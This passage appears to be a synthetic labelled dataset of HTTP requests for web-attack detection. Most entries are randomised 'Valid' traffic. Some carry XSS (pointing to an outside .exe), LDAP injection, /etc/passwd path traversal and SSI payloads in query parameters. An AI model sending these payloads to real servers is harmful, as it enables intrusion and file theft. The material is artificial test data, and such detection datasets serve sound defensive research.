Proxy-Authorization: NTLM d3Nlc245ZW11cWFIaHRlY2x3ZnRNd0tlZ2RkbmFvN3hzbnI=
Authorization: qsiu cptrzbka=gdqrh4
Range: 9-6,46-1
Referer: http://www.mihTsaeo.biz/lNnMbrw/btaclcm/6Ctsitg/ueeu.msf
TE: trailers,chunked
Trailer: Cache-Control
User-Agent: Mozilla/0.8 (Machintosh; U; PPC 9.8; 6G-fo; rv:6.7.6) Gecko/61142873
UA-CPU: x86
UA-Disp: 0486,5217,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6067x8441
Via: 6.7 172.141.66.6, FTP/3.1 www.nmH2fw.html, FTP/3.3 www.akmM2asf.css
Transfer-Encoding: identity
Upgrade: hutie/7.1
Warning: 852 www.tmttloo.html "nksortaobujtnde9N" 
X-Forwarded-For: 254.65.44.244
X-Serial-Number: 77079667
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 2582
Start - Id: 34262
class: Valid
PUT /r81ENPwK-5rYnEF.X/djJ/nQvnq/eMxA/sp/0YFF3TsWRySS5Y4h/sasiiYh/fFwexWRcY4S5S.shtml? HTTP/1.0
Content-Length: 311
Content-Language: rsea,mr,mmnO
Content-Encoding: compress
Content-Location: /qerl/fnE2on.txt
Content-MD5: bG5vcnJlY1Zjc2Fhd3VhNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Jun 05 15:14:47 UTC
Last-Modified: Wed, 25 Mar 09 14:20:35 CET
Host: www.oOffqriio.cz
Connection: close
Accept: */*;q=0.7
Accept-Charset: utf-7;q=0.4, x-mac-greek;q=0.1
Accept-Encoding: compress, identity;q=0.2
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 203.243.153.73
Cookie: epdeo67bthgr=itt;aS7xo=ueibrvt3i1rae3nsdk;oahn4ehasc=0;bnSt1mqHettyueh=ltsoaducedf0oeVr;vdwie=t:7re7&oth7cij
Cookie2: $Version="47"
Date: Mon, 05 Jan 04 03:51:36 CET
ETag: "R6VU5sbfP0eyLNEcx"
Expect: 100-continue
From: uoRceh@bnhno.gov
If-Modified-Since: Sat, 17 Mar 07 02:39:24 UTC
If-Unmodified-Since: Fri, 01 Jan 10 08:14:20 UTC
If-Match: *
If-None-Match: "ob7rAu.MyF_noGrAgEYN"
If-Range: Tue, 08 Jul 08 16:55:01 UTC
Max-Forwards: 1
MIME-Version: 4.2
Pragma: n23thi=t9l81v
Proxy-Authorization: Digest username="rtalafh1"
Authorization: Digest response="4Bd13f6Ad5b8d8dF5f5Ec4BFBEC8f9ad"
Range: -804943,968106-
Referer: http://AhtTrs.net/toxrHm3/9hsoaSh/hyEmE5t/eas2.jpeg
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/5.8 (compatible; Konqueror/8.9; Linux i386; IdnxIi2oa; l1jutqt; pbsiu7uSs)
UA-CPU: 68000
UA-Disp: 1874,1837,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6505x533
Via: HTTP/7.0 www.hr1uEh.html
Transfer-Encoding: M1ni; daireo=6ttTtr
Upgrade: ezhTe/9.1, i0t/1.3, huh/6.9, rDvATi/7.5
Warning: 954 www.nnennttt.js "hztaw" "Sat, 16 Oct 04 21:52:44 UTC"
X-Forwarded-For: 60.98.250.76
X-Serial-Number: 316874692201616
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5Gaksdalsdtfc=7374811&hIleRae=94675&bntes6lP7=a6Vp&nnaatMnepcoree=sU9&gnnythIA6=s5pcscriptmbe&9y8en=Strdhrnbperdoh5t&etlpOf31inhnpor=pwdndhrcrtsdaete&X43UAallsMZ=8mtss&brlseteAOecg=17980606&shTelsshan= H7L  tlu' &cFHjMkVo6jIs=99375&t8childMb=eIGhZVmzh&omsose=aWYr7&Cst-hFi=ech9zoinincludetg&inqhaiiasi=3807593

End - Id: 34262
Start - Id: 31398
class: Valid
GET /daksmf7A/riir-_6D/cgiB1SElI4cSXx/_hc0D_oE8pKQYIA/tLWXx4eHZaDwtLKKbxw/i30Ft9/egmnIA.htm?eemlcaeteni2d=ua+nlsy&amtPishwd=Hmwr&8hltrnsli=yGBA%40ikujHUz HTTP/1.0
Host: 169.197.179.159
Connection: gemA
Accept: audio/x-wav, text/*, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=944
Client-ip: 94.233.71.72
Cookie: t-TLVTDtUV=swhereh lnb\</node~wLo&s4m;ofe=35st9
Cookie2: $Version="0"
Date: Mon, 13 Jul 09 07:10:37 GMT
ETag: "MVtyvOfwt3vQ32x"
Expect: ksz0tj=gye9t
From: Tzeuatea@eoges.de
If-Modified-Since: Tue, 17 Oct 06 17:43:52 UTC
If-Unmodified-Since: Sat, 25 Feb 06 03:11:15 GMT
If-Match: "@W5sKhNV1O.uCONWmL"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM cnRobWJNaGVoaXJQb25zczFGc25hM2VuYW9zc2RPbGVkb3NubHRpYVRkTm8=
Authorization: Basic aG82aGxmUDo2aXRuZTI=
Range: -6182,52054-760058,9-
Referer: http://o9t8oUh.com/etiwA/n3vizs/btois/dcae/l2beshth.fgf
TE: deflate,deflate;q=0.8,trailers
Trailer: TE
User-Agent: pVOVoG http://www.eoora.it
UA-CPU: StrongARM
UA-Disp: 6015,3763,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2355x254
Via: 0.0 www.Minr.htm
Transfer-Encoding: deflate
Upgrade: eiKz/4.5, tfe/0.1, nnhn/4.9, fptn/7.8, iuaOf/8.9
Warning: 388 www.tfrat7d.jpeg:096 "hrsa7mrlleyurua" "Tue, 09 Mar 10 03:42:13 CET"
X-Forwarded-For: 160.213.53.125
X-Serial-Number: 886445544
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 31398
Start - Id: 4257
class: Valid
PUT /dbXHcCvdO/uiEtoaaia7ohhaNsldWi/meoenwtajioy6poJ/earowyte3o70ih/aeii2cLyhgeareru/wCv4w2tkLbVU/7NdXtKRK8/fqMG5u5b/bhCfm4iZF9.sh? HTTP/1.1
Content-Length: 265
Content-Language: dsxet,HtEilb,ni06too
Content-Encoding: identity
Content-Location: /iOnbdea.shtml
Content-MD5: b2lpc3Jkc2ZtcmF0QXRoMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Jul 05 11:38:09 CET
Last-Modified: Sun, 23 Mar 08 13:26:46 GMT
Host: 75.169.50.94:80
Connection: keep-alive
Accept: text/*, text/*;q=0.4
Accept-Charset: cp-950;q=0.2, x-mac-turkish;q=0.0, euc-kr
Accept-Encoding: *
Accept-Language: b-utO7;q=0.3, enngl-duRt03Y;q=0.8, weer-dux;q=0.5, qHe-f
Cache-Control: no-store
Client-ip: 113.87.214.25
Cookie: ek=tdAYZAEM9;Teb7atc=emdhynetopen
Cookie2: $Version="11"
Date: Sat, 27 Feb 10 04:26:02 UTC
ETag: "FZaQFhCBRmUNO@lzenU"
Expect: ooamse=aiiOI
From: sblb@seuhwa.net
If-Modified-Since: Tue, 26 Jun 07 23:38:10 GMT
If-Unmodified-Since: Mon, 24 Nov 08 22:38:46 GMT
If-Match: "jdQHBW4Ok-Vm0fi"
If-None-Match: *
If-Range: *
Max-Forwards: 746
MIME-Version: 7.5
Pragma: w8irmua='zweSGht'
Proxy-Authorization: Basic MnBJbm1EOnR4b3R4NjE=
Authorization: lDmi 2tRol=Iscsha
Range: 1-35021,-9128
Referer: http://www.a3weegi.it/Y0dhjeww/s0dw/eetcEs/ocfnik/m4PiH.gz
TE: gzip;q=0.9
Trailer: Trailer
User-Agent: Mozilla/3.7 (compatible; MSIE 1.4; Linux i586; deqrz; aIedvnod; e54Ya)
UA-CPU: StrongARM
UA-Disp: 4721,826,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 193x5257
Via: FTP/4.1 www.utSm.gif:7171, YnEnlr/1.3 www.rxsaoos.shtml, 7.6 www.tuo83a.jpg:04
Transfer-Encoding: identity
Upgrade: elldh/2.3, hhMe/5.9
Warning: 902 www.guyhomo.html "hhae" 
X-Forwarded-For: 240.213.181.129
X-Serial-Number: 62285156998436291420
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ginK=mhlh6h7len&qontldync=e9FzauDcNV1&n1s2cxyrNSacat=tcas+8r>ncp&watne=f](p8lPha&rah2whiaalooibo=~passwdlm&_I7@cFT=igddesoasecnea&msrcI8aDataoap=249&inyvtreeaeanne=598291&giTohre5ipii=yV5uc6GM8O&htzsta= ea&wtdodanobdeoadd=0&erTncb6krve1kw=3686&ah3hev=rhrd

End - Id: 4257
Start - Id: 47741
class: XSS
GET /linkL2ZAEhomeeZ@LM6U/aFEde-yLAEURt@SUZ4/rcp.Cyi3.png?s6rntok=2&looeeaneeSerI=%3Cdiv+++style+%3D+++%22+binding%3A++url%28%5Bhttp%3A%2F%2Fwww.ic.com%2Fscript%2Fvpwrir1u.exe%5D%29%3B+++%22%3E HTTP/1.0
Host: www.laOaueoy.be:31879
Connection: close
Accept: */*;q=0.9
Accept-Charset: windows-1251;q=0.1, windows-1250
Accept-Encoding: gzip;q=0.9, compress, deflate;q=0.1, compress
Accept-Language: *
Cache-Control: max-age=755
Client-ip: 241.206.24.189
Cookie: tieoP=97051;mxbR.s7=eeqm6e;ZexecfKFaWRVobjectTb=2xwuoscriptHeaamrhte;Ysamiwigphp8QEc=ncwrtaarristt
Cookie2: $Version="054"
Date: Thu, 21 May 09 11:46:20 GMT
ETag: "B3GtyHgDy1kQ_H-."
Expect: asn70
From: rlNe@ecetad6.fr
If-Modified-Since: Thu, 29 Apr 04 21:31:59 CET
If-Unmodified-Since: Sun, 11 Sep 05 03:38:26 GMT
If-Match: *
If-None-Match: "SsWaTrNxWk42BiGRZEf"
If-Range: Sat, 24 Sep 05 05:05:05 CET
Max-Forwards: 7547
MIME-Version: 7.7
Pragma: hhN='elsyza4s'
Proxy-Authorization: Basic czZVbmRodDphdW5zdG9u
Authorization: te0zsl ht56=rbiy4mx
Range: -887125,6715-3229
Referer: /psetnnaa/xaopuyn/5hts/Reed/on8odOee.nsf
TE: chunked;q=0.1,trailers
Trailer: Date
User-Agent: 8draaoi (c9vKtGVk; bWrI@RB-; htXEJZ8y6)
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0710x100
Via: HTTP/1.5 www.tbu5Dte.css:33
Transfer-Encoding: Ortu; dz2you=td8thhn
Upgrade: 1eEw/6.0
Warning: 204 41.21.10.144 "pfgeDet" 
X-Forwarded-For: 195.31.132.94
X-Serial-Number: 08031328367563648957
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47741
Start - Id: 11497
class: Valid
GET /wwtnuedeo1E09/e6JR.aspx?ebueuoti=1358327&eo=tem5r&4pTiohvqipben=iwas9alcicksj&nr5ozhbs=7c0Ianullenj+esu HTTP/1.1
Host: 78.150.234.41:83292
Connection: close
Accept: */*
Accept-Charset: iso-10646-ucs-2, x-mac-arabic;q=0.3, x-mac-greek, cp-932
Accept-Encoding: deflate;q=0.7, compress, identity;q=0.7, identity;q=0.5, gzip;q=0.8
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 202.164.225.150
Cookie: QdeleteZjVorcpvDpr=z a
Cookie2: $Version="655"
Date: Wed, 08 Aug 07 24:44:15 UTC
ETag: "3Dwipj9-HmvX_ycw"
Expect: 5Axnntk
From: ptnanb@hetye.de
If-Modified-Since: Thu, 14 Apr 05 08:00:53 UTC
If-Unmodified-Since: Fri, 31 Aug 07 18:06:09 UTC
If-Match: "-riy0FqggpsGca_"
If-None-Match: "ZbGR7NJSzzn-rn.z"
If-Range: Fri, 04 Aug 06 15:49:58 CET
Max-Forwards: 45
MIME-Version: 7.5
Pragma: qm=Ekfrm
Proxy-Authorization: Digest nonce
Authorization: NTLM amF0czBvZTBudGltYWR0c3JhckFlcnNxdm9hT2F0YWczZHJldG1z
Range: -36
Referer: http://nlett.com/hhs6e/leae/Ge2p4.js
TE: trailers,trailers
Trailer: If-Match
User-Agent: lIAuuw1 http://www.edwt8era.org
UA-CPU: 68000
UA-Disp: 9055,045,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9366x217
Via: 7.7 71.191.4.225, FTP/4.0 106.249.100.80
Transfer-Encoding: gzip
Upgrade: whd/4.3, coe4aa/8.8, p7uf/2.5
Warning: 090 68.2.195.170:1 "ene5ebeNyr34uhehmh" "Sun, 10 Jun 07 01:27:55 CET"
X-Forwarded-For: 0.47.132.31
X-Serial-Number: 606663375
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11497
Start - Id: 38016
class: LdapInjection
GET /bodySadminHuEsvw/gcdhr/nrawnhernpsne/bVJD/ediehah.gif?ohnm0nmttg=sol%29%28+%7C+%28nt%3D*%29&ioent=uje&cYd0-l=Moi+el%26ediv&oarande=heeeef8eof2cs HTTP/1.0
Host: www.t7cCwtu3.com
Connection: close
Accept: image/gif;q=0.5, text/*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: compress, identity;q=0.2, gzip;q=0.6, compress, deflate;q=0.0
Accept-Language: umci0sr-q, ySl3eQr-nIoosnEe, 2g-irb, yn9ie-t9tEpv;q=0.8, nhEshies-2;q=0.2
Cache-Control: spIsf='esueemdr'
Client-ip: 204.64.18.91
Cookie: hl9nZrnniyPtl=ftett8htif
Cookie2: $Version="3"
Date: Wed, 30 Aug 06 23:28:27 UTC
ETag: "zGwbkaD56y2_UjA"
Expect: hAenvtnw
From: 8nlhbept@3gle.ch
If-Modified-Since: Thu, 19 Mar 09 14:10:48 UTC
If-Unmodified-Since: Thu, 14 Jun 07 10:22:52 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 42
MIME-Version: 8.2
Pragma: dsier=iphxe
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: NTLM b2VudUVwaGV0dTRwb2V0Z3RIaW84YXRlZTFybWltaVRyQThvZXRn
Range: 28-,220237-8,8-
Referer: /agtrNgiT/behNJaoa/Im0to.doc
TE: trailers,chunked;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: ccaiehY (ePz-SSvyLA; rWF7bc6Zc9)
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: FTP/4.4 www.le6gn.html, swktd/1.5 www.EW4tetl.jpeg
Transfer-Encoding: deflate
Upgrade: obs/0.4, gbr/5.8
Warning: 576 www.4exea.gif "s8oN" 
X-Forwarded-For: 195.229.142.172
X-Serial-Number: 9679089566014
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38016
Start - Id: 1963
class: Valid
GET /tyohw8itirNda1F/3atettbisUeers/WrP5l/Mzm9y8q/u8vmaYDVhtpassn.gif?aueeiupsu=70978&miywylAjtDs=77&2eostdinoN9WSMD=371195 HTTP/1.0
Host: 99.165.13.223
Connection: sglg
Accept: */*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 93.59.198.99
Cookie: mcbconnectuvoR=ho1Deedh71;de=6SrgCe6CK6vL;le=vbscript-ebrr]anghe/aaf;LKdiy=b;qSnndeWwcml=8341;she0awt8sm4tb=2949342
Cookie2: $Version="3"
Date: Mon, 03 Jul 06 18:04:11 UTC
ETag: W/"plLBmnTpaJzgnQ."
Expect: 100-continue
From: ebeitt4@hsle.fr
If-Modified-Since: Sun, 13 May 07 12:35:47 UTC
If-Unmodified-Since: Sat, 24 Feb 07 08:16:03 GMT
If-Match: *
If-None-Match: "TLu7wZXmpCUcjt1P4E"
If-Range: "e98Pzop5HTDE4r3zKwyI"
Max-Forwards: 6
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: wiohon Esah=2tadyd
Authorization: NTLM ZXNOaXNkZXI4MWFhdHRtYWl2dHNJdG55ZWFpdHFvZXNkNDQzZHVpZFk=
Range: 907906-,4755-184
Referer: /l40e/aoem7tP/veo0.dll
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: gIlnn/5.2.8.8.4
UA-CPU: MIPS
UA-Disp: 702,657,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 668x278
Via: e2au/2.5 www.pitr.shtml, 8.6 www.soTi.css, 1.9 www.U30cot.jpeg
Transfer-Encoding: gzip
Upgrade: tsd/0.2, alvm/0.6, iEenc/5.7, nnoc/8.2, rtetzy/1.1
Warning: 246 144.242.96.229 "zhitriestohvafi" 
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 539815603365
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 1963
Start - Id: 13499
class: Valid
GET /nrehnxuuemtrnnel/lNiskzhi6rbCi/JD9p4yt.MV/sJx@MTQ5fRXIT/hjwgtneq7nlcuEcQutv/rhnaheTsssgnfo5To/trOxyLHDSQ/sDFZzlz4SMK_Q4/pB9TuJ6/97yeQ.jpg?itiaPd8nd=88&sfh9hrsuieodeex=ryar7hNSre%3Dnod&Tebttc28zrifOm=0556&ejn1ocshvh=Srl0eynwii&evakhlOeota=6764 HTTP/1.1
Host: 105.151.71.61:65
Connection: Nsngj
Accept: */*;q=0.1
Accept-Charset: iso-8859-9;q=0.4, iso-8859-5;q=0.9, iso-8859-9
Accept-Encoding: *
Accept-Language: eSeaI-x;q=0.1, vdttIla3-r
Cache-Control: max-age=4225
Client-ip: 180.68.206.0
Cookie: sa7rde=d6ueN;ck03mitse=aG;ghmr8=80;9zjK_HUstdin48.=hrzh3eraaccess_logEgcopyvary
Cookie2: $Version="03"
Date: Tue, 02 Sep 08 09:03:20 GMT
ETag: "DK3ulFf1b1kma5xmF"
Expect: 100-continue
From: netoed@RhSevedeen.ch
If-Modified-Since: Thu, 30 Aug 07 06:06:57 CET
If-Unmodified-Since: Tue, 01 Mar 05 16:01:07 GMT
If-Match: *
If-None-Match: "X3eO8Ek.gFTBsk_"
If-Range: Mon, 15 Jan 07 11:59:59 CET
Max-Forwards: 4592
MIME-Version: 8.8
Pragma: gAcs='evi'
Proxy-Authorization: Basic Mm9qdDpUc2Vkam5l
Authorization: Digest nonce
Range: 81977-983962,396-,08380-3287
Referer: /rngobdc/nlmtmn/8ifb/neU13e/vlydll.gif
TE: trailers,trailers
Trailer: Expect
User-Agent: aEsodIdzplo
UA-CPU: x86
UA-Disp: 908,0638,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 912x6854
Via: 2.1 www.0hebdsEl.tiff, FTP/5.0 6.54.214.187
Transfer-Encoding: gzip
Upgrade: sldtn/3.8
Warning: 109 178.4.211.203 "uhlowDrttArs" "Fri, 26 Feb 10 23:40:50 GMT"
X-Forwarded-For: 102.230.110.42
X-Serial-Number: 44417038819
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13499
Start - Id: 46265
class: PathTransversal
GET /n8QyEYpOOke7Gzk/s6/Y4/oXA80jVH2r7/npA9hdaAtnnioup/3croii9sadc/mk3cddePthvxi/ni9srilfaeesi/9f9fop01zqVZyusr/e9jfWT/tIi/brCHaNaiz.js?dprte1Ms=+%3Ftn1Esneeaccess_logaea&ooutnly2=%2Fetc%2Fpasswd HTTP/1.0
Host: www.inpfanlIg.net
Connection: keep-alive
Accept: text/plain, text/*;q=0.9, application/rtf
Accept-Charset: iso-8859-1;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: 3wepso-setaue;q=0.8, Hetnr-eol8slo
Cache-Control: only-if-cached
Client-ip: 117.131.231.99
Cookie: fhF3ZTjs=hia
Cookie2: $Version="45"
Date: Sun, 18 Oct 09 24:55:03 CET
ETag: "Fckwci7JyzHOJHW6"
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Sat, 18 Jul 09 09:43:05 CET
If-Unmodified-Since: Sat, 12 Feb 05 22:45:52 CET
If-Match: "OQJAU4WpPPnXu@r"
If-None-Match: "KfGa4I33X5fXQmtG"
If-Range: *
Max-Forwards: 2916
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM eXJRM2xlZHJodDRlMmtnN3dyYWV0ZWd1YWVxaWFFdmcxZWVlb2xpc2Fv
Authorization: Digest qop=ctrsh
Range: 723-2
Referer: /srrzIhu/eEot/elsta46/stsraS/sEtenrke.aspx
TE: gzip,trailers,deflate
Trailer: If-Modified-Since
User-Agent: rfneTd/2.8
UA-CPU: PowerPC
UA-Disp: 5467,9007,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: 9.4 www.Iqtes.jpg:12
Transfer-Encoding: gzip
Upgrade: roeie/1.4
Warning: 687 www.ndt99mt.png:13587 "extsrsgust" "Thu, 14 Feb 08 08:06:55 UTC"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 1060683
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46265
Start - Id: 38969
class: LdapInjection
GET /etemtO29ehd/C15SvNPwUPb/GWyRF8x50E97/a7tarouewbv/qMwinnt@T1@_EWpositionZ@71/06ROFB.xtgwyymU3.html?cuaapntiu=12264&wpAYuTboot.iniRg5Bt=ekue&ZVMC=08&ebnaulo=nimz&lfu60e=1&ntdhOga=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&eiee=5879&sssniutrI=y%5Chttph%24&eoecUOSia9S4mah=aaoI&nl=17679397&ssi1ca9tshft=alhe&imttsmw=abeym HTTP/1.1
Host: 202.141.146.44:307
Connection: iiaa5etn
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.7
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 69.251.232.95
Cookie: s6nowlds=se2;e9tsmSsc1=h8m7UaeKbI01;ellpzhoahobn9=aou
Cookie2: $Version="8"
Date: Wed, 30 Jul 08 10:27:39 CET
ETag: W/"dRxAxqumEJEBKcg"
Expect: 100-continue
From: hisAka@u5t1a5.st
If-Modified-Since: Sat, 03 Apr 04 02:19:27 UTC
If-Unmodified-Since: Sun, 06 Jan 08 13:27:38 CET
If-Match: "Rl7tXdkFwsQdS-_"
If-None-Match: *
If-Range: "j5ZdbJC-rGTB3Cm_4"
Max-Forwards: 4806
MIME-Version: 6.4
Pragma: srEedhl='Snxio'
Proxy-Authorization: Digest cnonce="nisso"
Authorization: oestn o6ftes=tfla
Range: -4,236-4976,748576-21
Referer: http://www.nTam01pk.cz/tsLaaa/naet/8hs1ic/cwsi/vtnox.tiff
TE: chunked,trailers,trailers
Trailer: Pragma
User-Agent: tz8P2Cy2 http://www.tsyou5t.org
UA-CPU: 68000
UA-Disp: 716,7145,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0621x5666
Via: 2.2 www.msmmhbh.gif, HTTP/4.2 189.71.159.95:9, hehsw/5.7 www.swch.html:55547
Transfer-Encoding: identity
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 999 www.oaeahnta.png "eic0ioogCftiu" "Wed, 23 May 07 22:46:40 GMT"
X-Forwarded-For: 181.46.26.226
X-Serial-Number: 498357729
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38969
Start - Id: 39439
class: SSI
GET /fvUw9D2zC2L7R/cwT8_8Sjuwunionl/u9i6eltntFc/eoaw6jrs1/cg@IgARKCfOLIfGR/oFtMEuO7BVqcw/FhitsknncmmkAshh/potshyA171/rLVze0cy@DbIk.T.1Ah/7Ti/6r4nbimbdtUtermaslR/mVQanOX_.php4?fSoi8o2svyote7=4&htwdtmcc6ra=r&drnqeyb=8829692&etuidtdyebm=icoLtpj&ebejni=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&hnmamt=43&fsueeikeersmxes=oa0meaoouu4a HTTP/1.0
Host: 215.251.111.35
Connection: close
Accept: text/xml;q=0.1, audio/*;q=0.3
Accept-Charset: x-mac-japanese;q=0.2, iso-8859-6;q=0.0, x-mac-chinesesimp;q=0.9
Accept-Encoding: deflate;q=0.1
Accept-Language: I3eEiIt-iIchddt, ertla-ya1n
Cache-Control: nhgwbw=sn8ooS4
Client-ip: 69.64.197.144
Cookie: ksZLQo@L0Z7=4e+ie'eeifguilinput4Som;idrdeCp=i;Yitgmhzo=06791502
Cookie2: $Version="308"
Date: Wed, 04 Mar 09 12:15:15 CET
ETag: W/"g-ksgTJnyj4@HQLJR7_n"
Expect: 100-continue
From: 1y6tgnnt@o4or4ie9a.com
If-Modified-Since: Thu, 06 Dec 07 10:11:44 CET
If-Unmodified-Since: Sun, 20 Nov 05 16:43:22 UTC
If-Match: *
If-None-Match: *
If-Range: "ghcvZRmM6m1@HUw4zXuo"
Max-Forwards: 751
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: rashN riiam=cssstki
Authorization: Lmeeh zrll=ad9eahiy
Range: 73-4339,804-,5553-97644
Referer: /ur29du/moBe/a8ed/eeNn3t/Wioysbpy.cgi
TE: gzip;q=0.9,trailers,deflate;q=0.7
Trailer: Authorization
User-Agent: kczzfo/8.4.0.3.5
UA-CPU: PowerPC
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 162x589
Via: 9.4 64.91.206.115
Transfer-Encoding: gzip
Upgrade: r94e/0.1, hme/5.5, ammrcS/1.0, aznO/2.8
Warning: 428 www.oheYza.htm "hrtat8k" "Sat, 01 Oct 05 21:42:07 CET"
X-Serial-Number: 7022355683967600
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39439
Start - Id: 9910
class: Valid
GET /7H__EBrrnTYyGih1vIEe/tahncbhddotl0a/tbnrtossmsh5ortr.jpeg?VdnWbodyi@n=246507&itcHg1p=7479&fi=inputd2&E.Hlog.shle3=sahynbin+nmetaArt%7Csb%27te&cergecaenIrenI=ther%22linet+rdropl%22+2hi&omho=eNI&nh=aoi1st0ot&tiAberkte3iea=+&8eahaoj=T0ielogl&as1oete3pohentn=+eLsautoexecst+opt+l2lsystem%29au HTTP/1.1
Host: www.sc0cgnet1.cz
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254;q=0.3, windows-874;q=0.4, windows-1255, windows-1255;q=0.5, x-mac-arabic;q=0.6
Accept-Encoding: gzip;q=0.9, deflate, identity;q=0.1, gzip, deflate;q=0.8
Accept-Language: *;q=0.5
Cache-Control: min-fresh=1974
Client-ip: 249.99.67.14
Cookie: 0slsdatbhhyvii=hneo(havscriptdcb otn6$e;2ej0lte=iueahpda7sn
Cookie2: $Version="2"
Date: Wed, 26 Nov 08 02:38:13 UTC
ETag: "Gnh5nWnu7dc3KLCnHJ"
Expect: 100-continue
From: reieurea@btrTy7r.com
If-Modified-Since: Thu, 11 Feb 10 01:19:09 CET
If-Unmodified-Since: Sun, 17 Oct 04 24:00:01 CET
If-Match: "utEIS.aGUlr5vPF"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 4.6
Pragma: tnce='ons6'
Proxy-Authorization: Basic YzFvNmhldG46dW5uNmxkdDY=
Authorization: NTLM NXNiY3NmMHdhSXREZDJhaE5vaWhlc3hldGhJaHBuc0Jvd2E=
Range: 3507-
Referer: /vwoh.txt
TE: deflate;q=0.0
Trailer: Range
User-Agent: noaepvaw (e5wa8R6)
UA-CPU: Sparc
UA-Disp: 042,750,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 475x606
Via: FTP/4.7 www.vedoAan.tiff, 9.1 www.Rlimao.jpeg, 2.0 www.iwrda2.png
Transfer-Encoding: gzip
Upgrade: eeTeSO/6.3, 4nyt/9.4
Warning: 983 www.cr4egnne.tiff "nyefhAeast3" 
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 15113
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 9910
Start - Id: 33788
class: Valid
POST /NKFUaV@B@in7RS/eTaBDrYpY_e30.htm? HTTP/1.1
Content-Length: 158
Content-Language: j0
Content-Encoding: gzip
Content-Location: http://trtr9h.org/ttz2o3/fiuCer.php3
Content-MD5: bHR6bmd0dHJld21mbnRvNg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Nov 07 04:00:34 CET
Last-Modified: Thu, 28 Jul 05 08:19:35 GMT
Host: 180.150.112.108
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-arabic, x-mac-icelandic;q=0.1, x-mac-greek, iso-8859-8-i;q=0.0, x-mac-cyrillic;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 165.218.61.59
Cookie: cldre2tta=0naWgSC2BtD;ahreioee8tetpts=0743;kobc=44;tn1ahtutcucgs=249
Cookie2: $Version="26"
Date: Tue, 07 Aug 07 06:26:18 CET
ETag: W/"JQn0iddRThZH-WfaUnK_"
Expect: c9cyhx
From: 0Fg3@seui.it
If-Modified-Since: Tue, 11 Nov 08 04:58:03 GMT
If-Unmodified-Since: Thu, 17 Jul 08 24:59:46 UTC
If-Match: *
If-None-Match: "whW@Q2fXw10fE1f"
If-Range: *
Max-Forwards: 3725
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: dnar oricoou=Orhtma
